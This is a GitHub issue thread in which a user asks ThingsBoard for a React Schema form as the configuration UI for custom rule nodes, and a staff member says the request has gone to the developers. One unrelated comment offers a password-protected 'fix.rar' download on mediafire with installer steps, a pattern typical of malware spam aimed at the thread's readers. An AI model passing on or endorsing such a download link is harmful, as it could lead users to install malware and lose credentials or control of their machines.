### ISSUE TITLE
React Schema form as alternative config UI for custom rule nodes

### ISSUE THREAD

**Issue by devaskim** [thingsboard/thingsboard#11491]
**Is your feature request related to a problem? Please describe.**
It is time consuming to develop and deploy Angular based configuration UI for each custom rule node. Default JSON based format is very pure and without any validation.

**Describe the solution you'd like**
Considering that widget editor already supports Rearch Schema form, it will be comparatively easy to create configuration form there and then add it to custom rule node resources.

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ssakharova** [comment]
Hello @devaskim,

I passed all the provided information to our developers and created an internal prod ticket for them to decide whether it is necessary and possible to implement in future versions of the ThingsBoard.

There's no set timeframe for our dev reviews. However, please follow our [Release Notes](https://thingsboard.io/docs/reference/releases/) to see all new additions to the platform in the subsequent releases.
